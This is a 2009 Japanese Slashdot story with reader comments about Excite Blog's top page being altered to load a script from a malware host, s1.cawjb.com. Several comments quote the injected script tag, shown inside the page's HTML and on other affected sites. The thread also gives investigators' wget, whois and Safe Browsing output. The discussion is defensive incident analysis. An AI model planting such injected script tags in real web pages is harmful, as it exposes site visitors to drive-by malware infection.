パスワードを忘れた? アカウント作成
44229 story
セキュリティ

エキサイトブログのトップページが改ざんされ、悪意のあるスクリプトが埋め込まれる 40

ストーリー by hylom
正月狙い? 部門より

Motohiko 曰く、

セキュリティホールmemo 2009/1/4付け記事より。エキサイトブログトップページにマルウェアサイト s1.cawjb.com への接続を行うような改竄がされているとの話題がエキサイトブログ掲示板に挙がっている。タレコミ時点でもスクリプトが挿入されていることを確認している。

【緊急注意喚起】改ざんされたWebサイト閲覧による組織内へのボット潜入被害について[12/24更新] | LACによると、2008年12月後半から日本国内のコンピュータからのボットによるとみられる攻撃が急増していると推測されるという。同記事によると悪用されている脆弱性はMS06-014MS08-078、Adobe Flash Playerのもの (詳細不明) とのことなので、まずは手許の環境のセキュリティ状態を確認しよう。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • by baka_gahaku (4542) on 2009年01月04日 18時56分 (#1485086) 日記
    驚いた、現在でもスクリプトが埋め込まれている、要注意。
    (送られてきているもの自体は、404表記のHTMLに見えるけど、詳しく追ってないので本当に404なのかは不明)

    それと、safariで「cawjb.com」を(URL入力して)表示させようとすると、「ヤバいところにつなごうとしているよ!!」って教えてくれるのに、こういう方法で読み込まれちゃうと、何もメッセージがでないんだね。

    意味半減だよね…
    • by masakun (31656) on 2009年01月04日 19時39分 (#1485105) 日記
      この jp.js ページをダウンロードして OS/2システムエディタで開いてみましたが、

      <html><head><title>Object Not Found</title></head><body><h1>HTTP/1.1 404 Object Not Found</h1></body></html>

      としか書かれていませんでした。すでに撤収済み?

      ただGoogle Safe Browsing diagnostic page for cawjb.comページによれば、

      "Has this site acted as an intermediary resulting in further distribution of malware?
      Over the past 90 days, cawjb.com appeared to function as an intermediary for the infection of 619 site(s) including 114korea.co.kr/, baekmin.com/, heartsave.co.kr/.

      Has this site hosted malware?
      Yes, this site has hosted malicious software over the past 90 days. It infected 1207 domain(s), including socuri.net/, beewonbowling.co.kr/, nexgens.com/."

      ということで過去90日間に多くのサイトに埋め込まれた実績があるとか。今後復活するかもしれませんね。

      http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://s1.cawjb.com/jp.js

      親コメント
      • by Anonymous Coward
        つまり韓国のサイトに同様の行為が起きてるが、Exblog.jpごとをバンしようとはしないわけだ。
    • by Anonymous Coward
      明日対処するつもりなのでしょう。
      (休日は対応いたしませんって、暗に証明して見せちゃってるよな。コレ)
  • 編集者への疑問 (スコア:3, すばらしい洞察)

    by Anonymous Coward on 2009年01月04日 20時00分 (#1485114)

    タレコミ時点でもスクリプトが挿入されていることを確認している。

    にもかかわらず、エキサイトブログのトップページへのリンクが
    張られているのはなぜなんでしょうか?

    うっかりクリックしてしまう人がいることを考えると、
    対策がなされたことを確認するまではリンクを張るべきではないのでは?
    • Re:編集者への疑問 (スコア:3, おもしろおかしい)

      by narunaru (30931) <{mikahosi} {at} {abox9.so-net.ne.jp}> on 2009年01月04日 20時29分 (#1485123)
      /.jにそんな間抜けはいないから大丈夫ですよ。
      親コメント
      • Re:編集者への疑問 (スコア:1, すばらしい洞察)

        by Anonymous Coward on 2009年01月05日 0時58分 (#1485203)
        とはいえ「エキサイト 改ざん」とかでググるとスラドは上位に。
        良く知らない人が記事を読む可能性もありますよ。
        親コメント
        • by Anonymous Coward
          エキサイトがホスティングしているページが1番目に表示される
        • by Anonymous Coward
          掲載時点ではまだ上位に上がってなかったんですよ
      • by Anonymous Coward
        「押すなよ。絶対押すなよ!」
        と念を押されると、いかなる手段を用いてでも押したくなるのがアレゲ魂。

        むしろノーガード戦法の方が安全なのでは。
    • うっかりクリックしてしまう人がいることを考えると、
      対策がなされたことを確認するまではリンクを張るべきではないのでは?

      エキサイトブログ掲示板のコメント (#6および) #8 [excite.co.jp]によると、リンク先のスクリプトは2008/12/19時点で削除されているとのことです。ドメインが失効している訳ではないので危険が再発する虞はありますが、ちょっとは安心ともいえるのではないかと。あとはセキュリティソフトがきちんとこの件を検出できるかですね (avast!が検出して云々というのが当該スレッドの始まりです)。

      ところでオフトピですが、うちのVista機ではKB960714 (MS08-078のパッチ) がインストール出来ません。何かと衝突してるっぽいですが、このパッチはセーフモードではインストールできないんですよね…。一つ一つサービスを停止して試していかないといけないのかなぁ。

      親コメント
    • by Anonymous Coward
      子供じゃないんだから。
    • by Anonymous Coward
      いま間違えてクリックしてしまいました(T_T)
      リンクをクリックするつもりはなく、Firefoxのウィンドウをアクティブにするつもりで手が滑りました(T_T)
      • Re: (スコア:0, 参考になる)

        by Anonymous Coward
        W3Mでソースを除いたところ、該当スクリプトは除去されていたから、大丈夫でしょう。
        • by Kinsan (1044) on 2009年01月05日 9時32分 (#1485284) 日記

          どこに付けようかと思いましたが、ここにします。

          ダウンロードしてみたら、実質的に空の内容だったから大丈夫と書かれている方が何名かいますが、User-Agent辺りをどういう設定でアクセスしたのか、書いてもらえるとより良い情報になろうかと思います。

          ちょっと賢ければ、IEだと思わなければ、ダミーの内容を返すCGIにしている可能性がありますので。

          親コメント
  • by acc (36768) on 2009年01月05日 11時24分 (#1485355)
    exblogもついにという感じでしょうか。

    昨年はfc2で大規模にブログテンプレートが改竄され、
    中国の某MMOアカウントハックウイルスに感染して被害が多数でました。

    blogだとお題が明確なので、ターゲットを絞ったウイルスの頒布が効率よくできるという側面が
    ある気がします。

    今回、exblogが書きかえられたということは、fc2と同じ道をたどる可能性があるということでしょうか。

  • やっと (スコア:2, 参考になる)

    by acc (36768) on 2009年01月05日 18時32分 (#1485620)
    公式の報告 [exblog.jp]が出たようです。

    細かくは書かないけど、とりあえず問題ないから安心してくれよナッ!

    的な文章に感じてしまいました。
  • 思わず (スコア:1, 興味深い)

    by Anonymous Coward on 2009年01月04日 18時46分 (#1485078)
    クリックしちゃったけど、いいのかな?
  • by ei (19798) on 2009年01月04日 18時56分 (#1485087) 日記
    すると

    ...
    Resolving s1.cawjb.com... 60.196.70.130
    Connecting to s1.cawjb.com|60.196.70.130|:80... connected.
    HTTP request sent, awaiting response... 404 Object Not Found
    ...
    だとさ。

    # そーゆーものなの?
    • 60.196.70.130 (スコア:3, 興味深い)

      by KuRo-CaT (31239) on 2009年01月04日 19時22分 (#1485096)
      % [whois.apnic.net node-1]
      % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html [apnic.net]

      inetnum: 60.196.0.0 - 60.197.255.255
      netname: BORANET
      descr: DACOM, Internet Service Provider, Seoul, Korea
      country: KR
      admin-c: DB50-AP
      tech-c: DB50-AP
      status: ALLOCATED PORTABLE
      mnt-by: APNIC-HM
      mnt-lower: MNT-KRNIC-AP
      remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      remarks: This object can only be updated by APNIC hostmasters.
      remarks: To update this object, please contact APNIC
      remarks: hostmasters and include your organisation's account
      remarks: name in the subject line.
      remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      changed: hm-changed@apnic.net 20040729
      changed: hm-changed@apnic.net 20060328
      source: APNIC

      role: DACOM BORANET
      address: DACOM Bldg., 706-1, Yoeksam-dong, Kangnam-ku
      address: Seoul
      country: KR
      phone: +82-2-2089-7755
      fax-no: +82-2-2089-0706
      e-mail: ipadm@nic.bora.net
      e-mail: abuse@bora.net
      e-mail: security@bora.net
      admin-c: PE32-AP
      tech-c: PE32-AP
      nic-hdl: DB50-AP
      mnt-by: MNT-KRNIC-AP
      notify: hostmaster@nic.or.kr
      remarks: IP address administrator group of NIC team, DACOM Corp.
      remarks: If related with spam, send mail to abuse@bora.net
      remarks: If related with security, send mail to security@bora.net
      remarks: Only for whois information correction, send mail to ipadm@nic.bora.net
      changed: jeonsi@bora.net 20041105
      changed: hm-changed@apnic.net 20060428
      source: APNIC

      inetnum: 60.196.0.0 - 60.197.255.255
      netname: BORANET-KR
      descr: LG DACOM Corporation
      country: KR
      admin-c: IA5-KR
      tech-c: IA5-KR
      status: ALLOCATED PORTABLE
      mnt-by: MNT-KRNIC-AP
      remarks: This information has been partially mirrored by APNIC from
      remarks: KRNIC. To obtain more specific information, please use the
      remarks: KRNIC whois server at whois.krnic.net.
      changed: hostmaster@nic.or.kr
      source: KRNIC

      #そんだけ
      親コメント
      • by Anonymous Coward
        また中国か!と思ったけど、韓国か。 このホスト自体もクラックされたゾンビPCかサーバなんだろうか。
        • by Anonymous Coward
          アドレスがSouth KoreaじゃなくてKoreaになってるからそれ自体国名の偽装じゃないの?
    • > 404 Object Not Found
      なので、そちらでは対応したってことじゃないかな。とりあえず。

      11月中旬ぐらいからボット経由らしい ssh brute force がしつこかったが。12月27日になって、新しく日本の何箇所かが加わっていた形跡あり。
      親コメント
  • by masakun (31656) on 2009年01月04日 18時24分 (#1485071) 日記
    とりあえず OS/2 でアクセスすれば無問題(w
    • by masakun (31656) on 2009年01月04日 20時07分 (#1485118) 日記
      s1.cawjb.com [google.co.jp]でググるとぞろぞろ出てきますね。

      ビッグカメラ.comのようにすでに修正されたり削除されたところばかりですけどね。まだ修正されていないページも相当ありそうですよ。
      たとえば、すでに攻撃ページがなくなっているのでリンクを張りますけど、

      ::: ハマ漢方皮膚クリニック [atopybest.jp]
         パワ?生食(センシキ)30個入り<script src=http://s1.cawjb.com/jp.js
      多摩人物園:人物情報:田中のぞみ [topicserv.com]
         タイトルに仕込まれているのでわかりやすい。
      ダイエイ:エコ商品一覧 [surfboard.co.jp]...

      相当広範囲のサイトが被害にあっている模様。

      # 時に煩わしいと感じながらもWindows Updateは自動更新にしているOS/2ユーザーのmasakun

      親コメント
    • cawjb.comで検索 [google.co.jp]すれば、
      やられたと思われるところはたくさん出てきます。

      が、よくみてみると埋め込みに失敗したものだけが
      引っかかっているみたい...
      親コメント
      • by Anonymous Coward
        > が、よくみてみると埋め込みに失敗したものだけが
        > 引っかかっているみたい...
        Googleはマークアップの中身まで検索してくれませんからね。
        大昔のAltaVistaはマークアップの中身を検索するモードがあったので、Javaアプレットだけを効率よく検索できたりして便利だったのですが。
    • by masakun (31656) on 2009年01月04日 19時22分 (#1485098) 日記
      埋め込まれているのはトップページのこの辺。

      <div class="mt15" id="oshirase">
              <h2 class="left_title disp" title="お知らせ">お知らせ</h2>
      <ul>

              <li><a href="http://www.excite.co.jp/relocate3/?co=jp/xbg/blogstaff/7760840;http://staff.exblog.jp/7760840/" >

                      <font color="red"><strong>ブログパーツ機能を追加しました<script src=http://s1.cawjb.com/jp.js></script></strong></font>

              </a>
              <span>
                &nbsp;[2008年12月24日]
                </span>
              </li>

              <li><a href="http://www.excite.co.jp/relocate3/?co=jp/xbg/blogstaff/7678508;http://staff.exblog.jp/7678508/" >
              ドガログサービス終了のお知らせ<script src=http://s1.cawjb.com/jp.js></script>
              </a>

              <span>
                &nbsp;[2008年11月21日]
                </span>
              </li>

              <li><a href="http://www.excite.co.jp/relocate3/?co=jp/xbg/blogstaff/7675309;http://staff.exblog.jp/7675309/" >
              「友達の最新記事」の更新再開のお知らせ<script src=http://s1.cawjb.com/jp.js></script>
              </a>
              <span>

                &nbsp;[2008年11月20日]
                </span>
              </li>

      なお Firefox 3 で ttp://s1.cawjb.com/jp.js にアクセスすると、Reported Attack Site! というアラーム画面が表示されますね。:-)

      Build identifier: Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.9.2a1pre) Gecko/20081229 Minefield/3.2a1pre
      親コメント
      • by Anonymous Coward on 2009年01月04日 20時01分 (#1485116)
        excite.co.jpのjavascriptを許可した状態でトップページを読み込んでfirebugで覗いてみると

        <script src="http://s1.cawjb.com/jp.js">
        1<html><head><title>Object Not Found</title></head><body><h1>HTTP/1.1 404 Object Not Found</h1></body></html>
        </script>
        #1485086 [srad.jp]みたいに無言で読み込まれちゃってました。

        (Mozilla/5.0 (X11; U; Linux x86_64; ja-JP; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.04 (hardy) Firefox/3.0.5)
        親コメント
  • by GPH (8223) on 2009年01月04日 21時17分 (#1485136) 日記
    単純に
    s.cawjb.com
    を検索したら、
    結構あちこちが怪しげにでてくる模様。用心には越したこと無いようですが・・・こまったもんだなあ。
  • by Anonymous Coward on 2009年01月05日 3時11分 (#1485244)
    cawjb.comは長安の政府サイトだけどさ、こんな挿入は中国圏のサイトにいっぱいされてるから今頃ニュースして騒いでもしかたないんじゃないの?

    地方へ帰ったら6ヶ月前に終了したアニメがまだ終わってなかったみたいな感じだ。古い古い。
  • by Anonymous Coward on 2009年01月05日 14時11分 (#1485457)
    に見えた
  • by Anonymous Coward on 2009年01月06日 22時42分 (#1486468)
    改竄されてるけど安全ってどういうことなんでしょうか
    ずっと前に始まった攻撃で誘導先はとっくになくなったけど攻撃だけがまだ自動で続いている状態?
typodupeerror

ソースを見ろ -- ある4桁UID

読み込み中...